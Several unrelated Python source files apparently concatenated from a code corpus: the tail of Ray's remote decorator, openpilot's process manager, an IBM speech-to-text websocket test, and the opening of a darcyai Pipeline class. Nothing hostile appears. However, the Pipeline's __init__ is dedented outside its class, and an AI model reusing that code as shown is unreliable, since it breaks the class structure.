            retry the failed task until the task succeeds, or the actor
            has reached its max_restarts limit. If set to `n > 0`, the
            system will retry the failed task up to n times, after which the
            task will throw a `RayActorError` exception upon :obj:`ray.get`.
            Note that Python exceptions are not considered system errors
            and will not trigger retries.
        max_retries (int): Only for *remote functions*. This specifies
            the maximum number of times that the remote function
            should be rerun when the worker process executing it
            crashes unexpectedly. The minimum valid value is 0,
            the default is 4 (default), and a value of -1 indicates
            infinite retries.
        runtime_env (Dict[str, Any]): Specifies the runtime environment for
            this actor or task and its children. See
            :ref:`runtime-environments` for detailed documentation.
        override_environment_variables (Dict[str, str]): (Deprecated in Ray
            1.4.0, will be removed in Ray 1.6--please use the ``env_vars``
            field of :ref:`runtime-environments` instead.) This specifies
            environment variables to override for the actor or task. The
            overrides are propagated to all child actors and tasks. This
            is a dictionary mapping variable names to their values. Existing
            variables can be overridden, new ones can be created, and an
            existing variable can be unset by setting it to an empty string.
            Note: can only be set via `.options()`.
    """
    worker = global_worker

    # Bare usage: `@ray.remote` directly on the function/class.
    if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
        # This is the case where the decorator is just @ray.remote.
        return make_decorator(worker=worker)(args[0])

    # Parse the keyword arguments from the decorator.
    valid_kwargs = [
        "num_returns", "num_cpus", "num_gpus", "memory", "object_store_memory",
        "resources", "accelerator_type", "max_calls", "max_restarts",
        "max_task_retries", "max_retries", "runtime_env"
    ]
    error_string = ("The @ray.remote decorator must be applied either "
                    "with no arguments and no parentheses, for example "
                    "'@ray.remote', or it must be applied using some of "
                    f"the arguments in the list {valid_kwargs}, for example "
                    "'@ray.remote(num_returns=2, "
                    "resources={\"CustomResource\": 1})'.")
    # NOTE(review): these asserts vanish under `python -O`; raising TypeError
    # would be safer but changes the exception type callers may catch.
    assert len(args) == 0 and len(kwargs) > 0, error_string
    for key in kwargs:
        assert key in valid_kwargs, error_string

    # All options are optional; use .get() uniformly (previously num_cpus and
    # num_gpus used a hand-rolled `kwargs[k] if k in kwargs else None`).
    num_cpus = kwargs.get("num_cpus")
    num_gpus = kwargs.get("num_gpus")
    resources = kwargs.get("resources")
    if not isinstance(resources, dict) and resources is not None:
        raise TypeError("The 'resources' keyword argument must be a "
                        f"dictionary, but received type {type(resources)}.")
    if resources is not None:
        assert "CPU" not in resources, "Use the 'num_cpus' argument."
        assert "GPU" not in resources, "Use the 'num_gpus' argument."

    accelerator_type = kwargs.get("accelerator_type")

    # Handle other arguments.
    num_returns = kwargs.get("num_returns")
    max_calls = kwargs.get("max_calls")
    max_restarts = kwargs.get("max_restarts")
    max_task_retries = kwargs.get("max_task_retries")
    memory = kwargs.get("memory")
    object_store_memory = kwargs.get("object_store_memory")
    max_retries = kwargs.get("max_retries")
    runtime_env = kwargs.get("runtime_env")

    return make_decorator(
        num_returns=num_returns,
        num_cpus=num_cpus,
        num_gpus=num_gpus,
        memory=memory,
        object_store_memory=object_store_memory,
        resources=resources,
        accelerator_type=accelerator_type,
        max_calls=max_calls,
        max_restarts=max_restarts,
        max_task_retries=max_task_retries,
        max_retries=max_retries,
        runtime_env=runtime_env,
        worker=worker)
|
manager.py | #!/usr/bin/env python2.7
import os
import sys
import fcntl
import errno
import signal
import subprocess
from common.basedir import BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
def unblock_stdout():
    """Fork into a pty so the child's stdout cannot block it.

    The child returns from this function and continues as the real program.
    The parent forwards SIGINT/SIGTERM to the child, makes its own stdout
    non-blocking, pumps the child's pty output to stdout until EOF, then
    exits with the child's wait status.
    """
    # get a non-blocking stdout
    child_pid, child_pty = os.forkpty()
    if child_pid != 0:  # parent
        # child is in its own process group, manually pass kill signals
        signal.signal(signal.SIGINT,
                      lambda signum, frame: os.kill(child_pid, signal.SIGINT))
        signal.signal(signal.SIGTERM,
                      lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
        fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
                    fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
        while True:
            try:
                dat = os.read(child_pty, 4096)
            except OSError as e:
                # EIO from the pty master means the child side closed (exit).
                if e.errno == errno.EIO:
                    break
                continue
            if not dat:
                break
            try:
                # NOTE(review): os.read returns bytes; writing them straight
                # to sys.stdout assumes Python 2 (see the file's shebang).
                sys.stdout.write(dat)
            except (OSError, IOError):
                pass
        # Exit with the raw wait status of the child.
        os._exit(os.wait()[1])
if __name__ == "__main__":
    # NEOS (the device OS) must be version >= 8; /init.qcom.rc marks the
    # device, /VERSION holds the installed OS version number.
    neos_update_required = os.path.isfile("/init.qcom.rc") \
        and (not os.path.isfile("/VERSION") or int(open("/VERSION").read()) < 8)
    if neos_update_required:
        # update continue.sh before updating NEOS
        if os.path.isfile(os.path.join(BASEDIR, "scripts", "continue.sh")):
            from shutil import copyfile
            copyfile(
                os.path.join(BASEDIR, "scripts", "continue.sh"),
                "/data/data/com.termux/files/continue.sh")

        # run the updater
        print("Starting NEOS updater")
        subprocess.check_call(["git", "clean", "-xdf"], cwd=BASEDIR)
        os.system(os.path.join(BASEDIR, "installer", "updater", "updater"))
        # Unreachable in the normal case: the updater reboots the device.
        raise Exception("NEOS outdated")
    elif os.path.isdir("/data/neoupdate"):
        # A previous OS update finished; remove its staging directory.
        from shutil import rmtree
        rmtree("/data/neoupdate")

    unblock_stdout()
import glob
import shutil
import hashlib
import importlib
import subprocess
import traceback
from multiprocessing import Process
import zmq
from setproctitle import setproctitle #pylint: disable=no-name-in-module
from common.params import Params
import cereal
ThermalStatus = cereal.log.ThermalData.ThermalStatus
from selfdrive.services import service_list
from selfdrive.swaglog import cloudlog
import selfdrive.messaging as messaging
from selfdrive.registration import register
from selfdrive.version import version, dirty
import selfdrive.crash as crash
from selfdrive.loggerd.config import ROOT
# comment out anything you don't want to run
# Maps process name -> either a python module path (str) to import and run,
# or a (relative directory, argv list) tuple for a native executable.
managed_processes = {
    "thermald": "selfdrive.thermald",
    "uploader": "selfdrive.loggerd.uploader",
    "controlsd": "selfdrive.controls.controlsd",
    "radard": "selfdrive.controls.radard",
    "ubloxd": "selfdrive.locationd.ubloxd",
    "mapd": "selfdrive.mapd.mapd",
    "loggerd": ("selfdrive/loggerd", ["./loggerd"]),
    "logmessaged": "selfdrive.logmessaged",
    "tombstoned": "selfdrive.tombstoned",
    "logcatd": ("selfdrive/logcatd", ["./logcatd"]),
    "proclogd": ("selfdrive/proclogd", ["./proclogd"]),
    "boardd": ("selfdrive/boardd", ["./boardd"]),  # not used directly
    "pandad": "selfdrive.pandad",
    "ui": ("selfdrive/ui", ["./start.sh"]),
    "calibrationd": "selfdrive.locationd.calibrationd",
    "visiond": ("selfdrive/visiond", ["./visiond"]),
    "sensord": ("selfdrive/sensord", ["./sensord"]),
    "gpsd": ("selfdrive/sensord", ["./gpsd"]),
    "orbd": ("selfdrive/orbd", ["./orbd_wrapper.sh"]),
    "updated": "selfdrive.updated",
}

android_packages = ("ai.comma.plus.offroad", "ai.comma.plus.frame")

# name -> multiprocessing.Process for everything currently started.
running = {}


def get_running():
    """Return the dict of currently running managed processes."""
    return running


# due to qualcomm kernel bugs SIGKILLing visiond sometimes causes page table corruption
unkillable_processes = ['visiond']

# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []

# Started at boot and kept alive for the whole session.
persistent_processes = [
    'thermald',
    'logmessaged',
    'logcatd',
    'tombstoned',
    'uploader',
    'ui',
    'gpsd',
    'updated',
]

# Started when the car turns on, stopped when it turns off.
car_started_processes = [
    'controlsd',
    'loggerd',
    'sensord',
    'radard',
    'calibrationd',
    'visiond',
    'proclogd',
    'ubloxd',
    'orbd',
    'mapd',
]
def register_managed_process(name, desc, car_started=False):
    """Register an extra managed process at runtime.

    Adds `desc` (module path or (dir, argv) tuple) under `name` and files it
    into the car-started or persistent list depending on `car_started`.
    """
    global managed_processes, car_started_processes, persistent_processes
    print("registering %s" % name)
    managed_processes[name] = desc
    # Pick the lifecycle bucket the process belongs to.
    bucket = car_started_processes if car_started else persistent_processes
    bucket.append(name)
# ****************** process management functions ******************
def launcher(proc, gctx):
    """Entry point for python managed processes.

    Runs inside a fresh multiprocessing.Process: imports module *proc*,
    renames the process, then hands control to its main(gctx).
    """
    try:
        # import the process
        mod = importlib.import_module(proc)
        # rename the process so it reads nicely in ps/top
        setproctitle(proc)
        # exec the process
        mod.main(gctx)
    except KeyboardInterrupt:
        cloudlog.warning("child %s got SIGINT" % proc)
    except Exception:
        # can't install the crash handler because sys.excepthook doesn't play nice
        # with threads, so catch it here.
        crash.capture_exception()
        raise
def nativelauncher(pargs, cwd):
    """Replace the current process with a native binary.

    Entry point for native managed processes; never returns on success.
    """
    exe = pargs[0]
    os.chdir(cwd)
    # because when extracted from pex zips permissions get lost -_-
    os.chmod(exe, 0o700)
    os.execvp(exe, pargs)
def start_managed_process(name):
    """Start a registered process by name; no-op if unknown or already running."""
    if name in running or name not in managed_processes:
        return
    spec = managed_processes[name]
    if isinstance(spec, str):
        cloudlog.info("starting python %s" % spec)
        proc = Process(name=name, target=launcher, args=(spec, gctx))
    else:
        pdir, pargs = spec
        cwd = os.path.join(BASEDIR, pdir)
        cloudlog.info("starting process %s" % name)
        proc = Process(name=name, target=nativelauncher, args=(pargs, cwd))
    running[name] = proc
    proc.start()
def prepare_managed_process(p):
    """Get a managed process ready to launch: pre-import python, build native."""
    spec = managed_processes[p]
    if isinstance(spec, str):
        # import this python
        cloudlog.info("preimporting %s" % spec)
        importlib.import_module(spec)
        return
    # build this process
    cloudlog.info("building %s" % (spec,))
    build_dir = os.path.join(BASEDIR, spec[0])
    try:
        subprocess.check_call(["make", "-j4"], cwd=build_dir)
    except subprocess.CalledProcessError:
        # make clean if the build failed
        cloudlog.warning("building %s failed, make clean" % (spec, ))
        subprocess.check_call(["make", "clean"], cwd=build_dir)
        subprocess.check_call(["make", "-j4"], cwd=build_dir)
def kill_managed_process(name):
    """Stop a managed process, escalating SIGINT/SIGTERM -> SIGKILL -> reboot.

    Processes listed in unkillable_processes never get SIGKILL (qualcomm
    page-table bug); after 15 extra seconds the whole phone is rebooted.
    """
    if name not in running or name not in managed_processes:
        return
    cloudlog.info("killing %s" % name)
    if running[name].exitcode is None:
        # first ask politely
        if name in interrupt_processes:
            os.kill(running[name].pid, signal.SIGINT)
        else:
            running[name].terminate()
        # give it 5 seconds to die
        running[name].join(5.0)
        if running[name].exitcode is None:
            if name in unkillable_processes:
                cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
                running[name].join(15.0)
                if running[name].exitcode is None:
                    # last resort: reboot the device rather than SIGKILL
                    cloudlog.critical("FORCE REBOOTING PHONE!")
                    os.system("date >> /sdcard/unkillable_reboot")
                    os.system("reboot")
                    raise RuntimeError
            else:
                cloudlog.info("killing %s with SIGKILL" % name)
                os.kill(running[name].pid, signal.SIGKILL)
                running[name].join()
    cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
    del running[name]
def pm_apply_packages(cmd):
    """Run `pm <cmd>` (e.g. enable/disable) on every comma android package."""
    for pkg in android_packages:
        system("pm %s %s" % (cmd, pkg))
def cleanup_all_processes(signal, frame):
    """Signal-handler-shaped teardown: disable android packages, kill everything.

    Also called directly as cleanup_all_processes(None, None) on shutdown.
    NOTE(review): the `signal` parameter shadows the signal module inside this
    function; it is only logged here, so that is currently harmless.
    """
    cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
    pm_apply_packages('disable')
    # copy the keys since kill_managed_process mutates `running`
    for name in list(running.keys()):
        kill_managed_process(name)
    cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
    """One-time manager setup: registration, logging context, log directory.

    With should_register=False a dummy dongle id is used (offline/dev mode).
    Raises if server registration fails.
    """
    global gctx
    if should_register:
        reg_res = register()
        if reg_res:
            dongle_id, dongle_secret = reg_res
        else:
            raise Exception("server registration failed")
    else:
        dongle_id = "c"*16
    # set dongle id
    cloudlog.info("dongle id is " + dongle_id)
    os.environ['DONGLE_ID'] = dongle_id
    cloudlog.info("dirty is %d" % dirty)
    if not dirty:
        os.environ['CLEAN'] = '1'
    # attach identity to both logging and crash reporting
    cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
    crash.bind_user(id=dongle_id)
    crash.bind_extra(version=version, dirty=dirty, is_eon=True)
    # make the log root world-writable for the child processes
    os.umask(0)
    try:
        os.mkdir(ROOT, 0o777)
    except OSError:
        # already exists
        pass
    # set gctx
    gctx = {}
def system(cmd):
    """Run *cmd* through the shell; log failures instead of raising."""
    try:
        cloudlog.info("running %s" % cmd)
        subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
    except subprocess.CalledProcessError as err:
        # keep only the tail of the output so the log event stays small
        cloudlog.event("running failed",
                       cmd=err.cmd,
                       output=err.output[-1024:],
                       returncode=err.returncode)
def manager_thread():
    """Main manager loop: start persistent processes, then react to thermal state.

    Each iteration blocks on a 'thermal' message and uses it to gate the
    uploader (temperature) and the car-started process group (ignition).
    Returns when the DoUninstall param is set.
    """
    # now loop
    context = zmq.Context()
    thermal_sock = messaging.sub_sock(context, service_list['thermal'].port)
    cloudlog.info("manager start")
    cloudlog.info({"environ": os.environ})
    # save boot log
    subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
    for p in persistent_processes:
        start_managed_process(p)
    # start frame
    pm_apply_packages('enable')
    system("am start -n ai.comma.plus.frame/.MainActivity")
    if os.getenv("NOBOARD") is None:
        start_managed_process("pandad")
    params = Params()
    logger_dead = False
    while 1:
        # get health of board, log this in "thermal"
        msg = messaging.recv_sock(thermal_sock, wait=True)
        # uploader is gated based on the phone temperature
        if msg.thermal.thermalStatus >= ThermalStatus.yellow:
            kill_managed_process("uploader")
        else:
            start_managed_process("uploader")
        # stop logging when the disk is (nearly) full
        if msg.thermal.freeSpace < 0.05:
            logger_dead = True
        if msg.thermal.started:
            for p in car_started_processes:
                if p == "loggerd" and logger_dead:
                    kill_managed_process(p)
                else:
                    start_managed_process(p)
        else:
            # car is off: reset the logger flag and stop the car group
            logger_dead = False
            for p in car_started_processes:
                kill_managed_process(p)
        # check the status of all processes, did any of them die?
        for p in running:
            cloudlog.debug(" running %s %s" % (p, running[p]))
        # is this still needed?
        if params.get("DoUninstall") == "1":
            break
def get_installed_apks():
    """Return {package_name: apk_path} for the installed Android packages.

    Parses `pm list packages -f` output lines of the form
    `package:<path>=<name>`.
    """
    # decode: check_output returns bytes on Python 3
    dat = subprocess.check_output(["pm", "list", "packages", "-f"]).decode("utf8").strip().split("\n")
    ret = {}
    for x in dat:
        if x.startswith("package:"):
            # rsplit so an '=' inside the apk path cannot break the unpack
            v, k = x.split("package:")[1].rsplit("=", 1)
            ret[k] = v
    return ret
def install_apk(path):
    """Stage an apk on /sdcard, `pm install -r` it, and clean up.

    Returns True when the install command succeeded.
    """
    # can only install from world readable path
    staged = "/sdcard/%s" % os.path.basename(path)
    shutil.copyfile(path, staged)
    result = subprocess.call(["pm", "install", "-r", staged])
    os.remove(staged)
    return result == 0
def update_apks():
    """Install or refresh the apks bundled under BASEDIR/apk.

    Compares the sha1 of each bundled apk against the installed copy and
    (re)installs when they differ; uninstalls first if a plain reinstall
    fails.
    """
    # install apks
    installed = get_installed_apks()
    install_apks = glob.glob(os.path.join(BASEDIR, "apk/*.apk"))
    for apk in install_apks:
        app = os.path.basename(apk)[:-4]
        if app not in installed:
            installed[app] = None
    cloudlog.info("installed apks %s" % (str(installed), ))
    # iterate the dict directly (was .iterkeys(), Python 2 only)
    for app in list(installed.keys()):
        apk_path = os.path.join(BASEDIR, "apk/"+app+".apk")
        if not os.path.exists(apk_path):
            continue
        # hash in binary mode: sha1 requires bytes on Python 3, and the
        # with-block guarantees the file handles get closed
        with open(apk_path, "rb") as f:
            h1 = hashlib.sha1(f.read()).hexdigest()
        h2 = None
        if installed[app] is not None:
            with open(installed[app], "rb") as f:
                h2 = hashlib.sha1(f.read()).hexdigest()
        cloudlog.info("comparing version of %s %s vs %s" % (app, h1, h2))
        if h2 is None or h1 != h2:
            cloudlog.info("installing %s" % app)
            success = install_apk(apk_path)
            if not success:
                cloudlog.info("needing to uninstall %s" % app)
                system("pm uninstall %s" % app)
                success = install_apk(apk_path)
            assert success
def manager_update():
    """Install the optional bundled vpn payload, then refresh the apks."""
    vpn_dir = os.path.join(BASEDIR, "vpn")
    if os.path.exists(vpn_dir):
        cloudlog.info("installing vpn")
        os.system(os.path.join(vpn_dir, "install.sh"))
    update_apks()
def manager_prepare():
    """Build cereal, then pre-import/build every registered managed process."""
    # build cereal first
    subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, "cereal"))
    # native builds use cwd-relative paths, so anchor at this file's directory
    os.chdir(os.path.dirname(os.path.abspath(__file__)))
    for proc_name in managed_processes:
        prepare_managed_process(proc_name)
def uninstall():
    """Queue a full data wipe and reboot into recovery (factory reset)."""
    cloudlog.warning("uninstalling")
    # the recovery image reads this command file on boot
    with open('/cache/recovery/command', 'w') as f:
        f.write('--wipe_data\n')
    # IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
    os.system("service call power 16 i32 0 s16 recovery i32 1")
def main():
    """Manager entry point: configure, prepare, then run the manager loop."""
    # the flippening!
    os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
    # env-var driven trimming of the process set (dev/debug modes)
    if os.getenv("NOLOG") is not None:
        del managed_processes['loggerd']
        del managed_processes['tombstoned']
    if os.getenv("NOUPLOAD") is not None:
        del managed_processes['uploader']
    if os.getenv("NOVISION") is not None:
        del managed_processes['visiond']
    if os.getenv("LEAN") is not None:
        del managed_processes['uploader']
        del managed_processes['loggerd']
        del managed_processes['logmessaged']
        del managed_processes['logcatd']
        del managed_processes['tombstoned']
        del managed_processes['proclogd']
    if os.getenv("NOCONTROL") is not None:
        del managed_processes['controlsd']
        del managed_processes['radard']
    # support additional internal only extensions
    try:
        import selfdrive.manager_extensions
        selfdrive.manager_extensions.register(register_managed_process)
    except ImportError:
        pass
    params = Params()
    params.manager_start()
    # set unset params to their defaults
    if params.get("IsMetric") is None:
        params.put("IsMetric", "0")
    if params.get("RecordFront") is None:
        params.put("RecordFront", "0")
    if params.get("IsFcwEnabled") is None:
        params.put("IsFcwEnabled", "1")
    if params.get("HasAcceptedTerms") is None:
        params.put("HasAcceptedTerms", "0")
    if params.get("IsUploadVideoOverCellularEnabled") is None:
        params.put("IsUploadVideoOverCellularEnabled", "1")
    if params.get("IsDriverMonitoringEnabled") is None:
        params.put("IsDriverMonitoringEnabled", "1")
    if params.get("IsGeofenceEnabled") is None:
        params.put("IsGeofenceEnabled", "-1")
    if params.get("SpeedLimitOffset") is None:
        params.put("SpeedLimitOffset", "0")
    if params.get("LongitudinalControl") is None:
        params.put("LongitudinalControl", "0")
    if params.get("LimitSetSpeed") is None:
        params.put("LimitSetSpeed", "0")
    # is this chffrplus?
    if os.getenv("PASSIVE") is not None:
        params.put("Passive", str(int(os.getenv("PASSIVE"))))
    if params.get("Passive") is None:
        raise Exception("Passive must be set to continue")
    # put something on screen while we set things up
    if os.getenv("PREPAREONLY") is not None:
        spinner_proc = None
    else:
        spinner_text = "chffrplus" if params.get("Passive")=="1" else "openpilot"
        spinner_proc = subprocess.Popen(["./spinner", "loading %s"%spinner_text],
                                        cwd=os.path.join(BASEDIR, "selfdrive", "ui", "spinner"),
                                        close_fds=True)
    try:
        manager_update()
        manager_init()
        manager_prepare()
    finally:
        # always take the spinner down, even if prepare failed
        if spinner_proc:
            spinner_proc.terminate()
    if os.getenv("PREPAREONLY") is not None:
        return
    # SystemExit on sigterm
    signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
    try:
        manager_thread()
    except Exception:
        traceback.print_exc()
        crash.capture_exception()
    finally:
        cleanup_all_processes(None, None)
    if params.get("DoUninstall") == "1":
        uninstall()
if __name__ == "__main__":
    main()
    # manual exit because we are forked
    sys.exit(0)
|
websocket_test.py | """
https://cloud.ibm.com/docs/speech-to-text?topic=speech-to-text-websockets#websockets
Speech samples
https://raw.githubusercontent.com/Azure-Samples/cognitive-services-speech-sdk/f9807b1079f3a85f07cbb6d762c6b5449d536027/samples/cpp/windows/console/samples/whatstheweatherlike.wav
https://www.signalogic.com/index.pl?page=speech_codec_wav_samples
http://www.voiptroubleshooter.com/open_speech/american/OSR_us_000_0010_8k.wav - american
http://www.voiptroubleshooter.com/open_speech/american/OSR_us_000_0030_8k.wav - american
http://www.voiptroubleshooter.com/open_speech/british/OSR_uk_000_0020_8k.wav - british
http://www.voiptroubleshooter.com/open_speech/french/OSR_fr_000_0041_8k.wav - french
"""
import json
import requests
import websocket
import threading
from threading import Thread
import os
from base64 import b64encode
from ibm_watson import IAMTokenManager
def _require_env(name):
    """Return os.environ[name], raising with a helpful message when unset."""
    if name in os.environ:
        return os.environ[name]
    raise Exception("Error no %s Defined!" % name)

# all connection settings must be provided through the environment
STT_API_KEY = _require_env('STT_API_KEY')
STT_API_URL = _require_env('STT_API_URL')
STT_WS_URL = _require_env('STT_WS_URL')
STT_HOST = _require_env('STT_HOST')
STT_PORT = _require_env('STT_PORT')
def get_audio_content():
    """Download and return the sample speech WAV used by this test."""
    result = requests.get(
        'https://raw.githubusercontent.com/Azure-Samples/cognitive-services-speech-sdk/'
        'f9807b1079f3a85f07cbb6d762c6b5449d536027/samples/cpp/windows/console/samples/whatstheweatherlike.wav')
    if result.status_code != 200:
        # fixed message typo: "audo" -> "audio"
        raise Exception('Error retrieving audio: %s' % result.status_code)
    return result.content
# fetch the sample audio once at startup
audio_content = get_audio_content()
# IAM token used as the access_token query parameter of the websocket URL
iam_token_manager = IAMTokenManager(apikey=STT_API_KEY)
stt_access_token = iam_token_manager.get_token()
# basic-auth header — NOTE(review): `headers` appears unused below; verify
auth = b64encode(b"apikey:" + STT_API_KEY.encode('ascii')).decode("ascii")
headers = {'Authorization': 'Basic %s' % auth}
broadband_model = 'en-US_BroadbandModel'
telephony_model = 'en-US_Telephony'
narrowband_model = 'en-US_NarrowbandModel'
recognize_url = "%s/v1/recognize?access_token=%s&model=%s" % (STT_WS_URL, stt_access_token, telephony_model)
speech_url = 'https://www.signalogic.com/melp/EngSamples/Orig/male.wav'
# transcription messages accumulated by on_message
output = []
def on_message(ws, message):
    """Collect STT messages and signal completion on the final result.

    Audio-metrics messages are kept at the front of `output`; result
    messages are appended.  Sets the `completed` event when the first
    result in a message is marked final.
    """
    print("### message ###")
    print(message)
    json_message = json.loads(message)
    metrics = json_message.get('audio_metrics', None)
    if metrics is not None:
        output.insert(0, json_message)
    results = json_message.get('results', None)
    # truthiness check also guards against an empty results list,
    # which previously raised IndexError on results[0]
    if results:
        output.append(json_message)
        if results[0].get('final'):
            completed.set()
def on_error(ws, error):
    """Log websocket errors to stdout."""
    print("### error ###")
    print(error)
def on_close(ws, *close_args):
    """Log websocket closure.

    Accepts and ignores the extra (status_code, message) arguments that
    newer websocket-client versions pass to the on_close callback, while
    remaining compatible with older versions that pass only `ws`.
    """
    print("### closed ###")
def on_open(ws):
    """Send the session 'start' action and unblock the main thread."""
    print("### opened ###")
    msg = {"action": "start",
           "audio_metrics": True,
           "interim_results": True,
           "processing_metrics": True}
    ws.send(json.dumps(msg).encode('utf8'))
    # main thread waits on this before streaming audio
    started.set()
def ws_thread(ws):
    """Thread target: run the websocket client loop until the socket closes."""
    ws.run_forever()
# handshake/completion events shared with the websocket callbacks above
started = threading.Event()
completed = threading.Event()
websocket.enableTrace(True)
ws = websocket.WebSocketApp(recognize_url, on_open=on_open, on_message=on_message, on_error=on_error, on_close=on_close)
th = Thread(target=ws_thread, args=(ws,))
th.start()
# wait until on_open has sent the "start" action
started.wait(None)
# stream the whole sample, then ask the service to finish up
ws.send(audio_content, opcode=websocket.ABNF.OPCODE_BINARY)
msg = {"action": "stop"}
ws.send(json.dumps(msg).encode('utf8'))
# Wait for 'final' to be set to true in results
completed.wait(None)
ws.close()
print('### output ###')
print(json.dumps(output, indent=4))
|
pipeline.py | import json
import os
import pathlib
import threading
import time
from collections import OrderedDict
from collections.abc import Iterable
from flask import Flask, request, Response, jsonify, render_template
from multiprocessing.pool import ThreadPool
from signal import SIGABRT, SIGILL, SIGINT, SIGSEGV, SIGTERM, SIGQUIT, signal
from typing import Callable, Any, Dict, Tuple, Union, List
from unittest.mock import sentinel
from darcyai.config import Config
from darcyai.config_registry import ConfigRegistry
from darcyai.cyclic_toposort import acyclic_toposort
from darcyai.input.input_multi_stream import InputMultiStream
from darcyai.input.input_stream import InputStream
from darcyai.log import setup_custom_logger
from darcyai.output.output_stream import OutputStream
from darcyai.perceptor.perceptor import Perceptor
from darcyai.perceptor.perceptor_node import PerceptorNode
from darcyai.perception_object_model import PerceptionObjectModel
from darcyai.processing_engine import ProcessingEngine
from darcyai.stream_data import StreamData
from darcyai.utils import validate_not_none, validate_type, validate
class Pipeline():
    """
    The Pipeline class is the main class of the darcyai package.

    # Arguments
    input_stream (InputStream): The input stream to be used by the pipeline.
    input_data_history_len (int): The number of input data items to be
        stored in the history. Defaults to `50`.
    pom_history_len (int): The number of POM items to be stored in the
        history. Defaults to `50`.
    metrics_history_len (int): The number of metrics items to be stored in
        the history. Defaults to `50`.
    num_of_edge_tpus (int): The number of Edge TPUs. Defaults to `1`.
    perceptor_error_handler_callback (Callable[[str, Exception], None]): The
        callback function to be called when a Perceptor throws
        an exception. Defaults to `None`.
    output_stream_error_handler_callback (Callable[[str, Exception], None]): The
        callback function to be called when an OutputStream
        throws an exception. Defaults to `None`.
    input_stream_error_handler_callback (Callable[[Exception], None]): The
        callback function to be called when an InputStream throws
        an exception. Defaults to `None`.
    perception_completion_callback (Callable[[PerceptionObjectModel], None]): The
        callback function to be called when all the perceptors have completed
        processing. Defaults to `None`.
    pulse_completion_callback (Callable[[PerceptionObjectModel], None]): The
        callback function to be called when a pipeline pulse completes.
        Defaults to `None`.
    universal_rest_api (bool): Whether or not to use the universal
        REST API. Defaults to `False`.
    rest_api_base_path (str): The base path of the REST API. Defaults to
        `None`; required when `universal_rest_api` is True.
    rest_api_flask_app (Flask): The Flask application to be used by
        the REST API. Defaults to `None`.
    rest_api_port (int): The port of the REST API. Defaults to `None`;
        required when `universal_rest_api` is True and no Flask app is given.
    rest_api_host (str): The host of the REST API. Defaults to `None`;
        required when `universal_rest_api` is True and no Flask app is given.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera,
    ...                     input_data_history_len=10,
    ...                     pom_history_len=10,
    ...                     metrics_history_len=10,
    ...                     num_of_edge_tpus=1,
    ...                     perceptor_error_handler_callback=None,
    ...                     output_stream_error_handler_callback=None,
    ...                     input_stream_error_handler_callback=None,
    ...                     perception_completion_callback=None,
    ...                     pulse_completion_callback=None,
    ...                     universal_rest_api=True,
    ...                     rest_api_base_path="/",
    ...                     rest_api_flask_app=None,
    ...                     rest_api_port=5000,
    ...                     rest_api_host="localhost")
    ```
    """
def __init__(self,
             input_stream: InputStream,
             input_data_history_len: int = 50,
             pom_history_len: int = 50,
             metrics_history_len: int = 50,
             num_of_edge_tpus: int = 1,
             perceptor_error_handler_callback: Callable[[str, Exception], None] = None,
             output_stream_error_handler_callback: Callable[[str, Exception], None] = None,
             input_stream_error_handler_callback: Callable[[Exception], None] = None,
             perception_completion_callback: Callable[[PerceptionObjectModel], None] = None,
             pulse_completion_callback: Callable[[PerceptionObjectModel], None] = None,
             universal_rest_api: bool = False,
             rest_api_base_path: str = None,
             rest_api_flask_app: Flask = None,
             rest_api_port: int = None,
             rest_api_host: str = None):
    """Validate arguments, initialize pipeline state, and install signal handlers.

    See the class docstring for parameter documentation.
    """
    # --- argument validation ---
    validate_not_none(input_stream, "input_stream is required")
    validate_type(input_stream, (InputStream, InputMultiStream),
                  "input_stream must be an instance of InputStream")
    validate_type(
        num_of_edge_tpus,
        int,
        "num_of_edge_tpus must be an integer")
    validate(
        num_of_edge_tpus > 0,
        "num_of_edge_tpus must be greater than 0")  # fixed message: "then" -> "than"
    if perceptor_error_handler_callback is not None:
        validate(callable(perceptor_error_handler_callback),
                 "perceptor_error_handler_callback must be a function")
    if output_stream_error_handler_callback is not None:
        validate(callable(output_stream_error_handler_callback),
                 "output_stream_error_handler_callback must be a function")
    if input_stream_error_handler_callback is not None:
        validate(callable(input_stream_error_handler_callback),
                 "input_stream_error_handler_callback must be a function")
    self.__set_perception_completion_callback(perception_completion_callback)
    if pulse_completion_callback is not None:
        validate(callable(pulse_completion_callback),
                 "pulse_completion_callback must be a function")
    self.__pulse_completion_callback = pulse_completion_callback
    if universal_rest_api:
        if rest_api_flask_app is not None:
            validate_type(
                rest_api_flask_app,
                Flask,
                "rest_api_flask_app must be of type Flask")
        else:
            # no externally supplied Flask app: we serve our own,
            # so port/host/base path are all required
            validate_not_none(rest_api_port, "rest_api_port is required")
            validate_type(
                rest_api_port,
                int,
                "rest_api_port must be of type int")
            validate(
                0 <= rest_api_port <= 65535,
                "rest_api_port must be between 0 and 65535")
            validate_not_none(rest_api_host, "rest_api_host is required")
            validate_type(
                rest_api_host,
                str,
                "rest_api_host must be a string")
            validate_not_none(
                rest_api_base_path,
                "rest_api_base_path is required")
            validate_type(
                rest_api_base_path,
                str,
                "rest_api_base_path must be a string")
        self.__flask_app = rest_api_flask_app
        self.__port = rest_api_port
        self.__host = rest_api_host
        self.__path = rest_api_base_path
    # --- pipeline state ---
    self.__input_stream = input_stream
    self.__num_of_edge_tpus = num_of_edge_tpus
